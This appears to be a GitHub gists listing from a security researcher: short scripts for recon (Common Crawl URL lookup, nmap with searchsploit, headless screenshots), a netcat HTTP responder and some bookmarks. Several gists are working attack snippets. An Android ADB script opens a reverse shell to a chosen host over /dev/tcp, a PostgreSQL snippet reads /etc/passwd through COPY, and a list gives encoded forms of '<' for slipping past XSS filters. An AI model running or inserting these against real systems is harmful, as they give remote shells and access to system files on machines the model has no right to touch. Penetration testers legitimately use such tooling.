View url.sh
#!/bin/bash
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-26-index?url=*.google.com&output=json" | jq -r .url | sort -
View gist:1b25babb78487e06d894aac9ceebecd9
## test is the program that returns response body
while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; sh test; } | nc -l 8909; done
## test sample
#!/bin/bash
echo "************PRINT SOME TEXT***************\n"
echo "Hello World!!!"
echo "\n"
View Nmap
Using nmap alongside searchsploit in Kali Linux to grab any low hanging fruit:
nmap -p- -sV -oX 71-new.xml 10.10.10.71; searchsploit --nmap 71-new.xml
This creates a xml file called 71-new.xml file, then reference the file using ; searchsploit --nmap 71-new.xml
chrisyoung.net
View postgre-etc.md
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
View cats.go
package main
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"strings"
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
View <.txt
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
View screenshot.sh
#!/bin/bash
chromium-browser --headless --disable-gpu --window-size=1920,1080 --screenshot http://$1 --screenshot=$RANDOM.jpg >/dev/null 2>&1
echo "[*] Screenshot Taken of http://$1 [*]"
View rename_based_on_content.sh
#!/bin/bash
grep -l STRINGTOFIND *.FILEXT|cut -d: -f 1|sort -u|xargs -I {} mv "{}" PREFIX-"{}".FILEXT
View bookmarks.html
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en
https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec
https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune
https://blog.innerht.ml/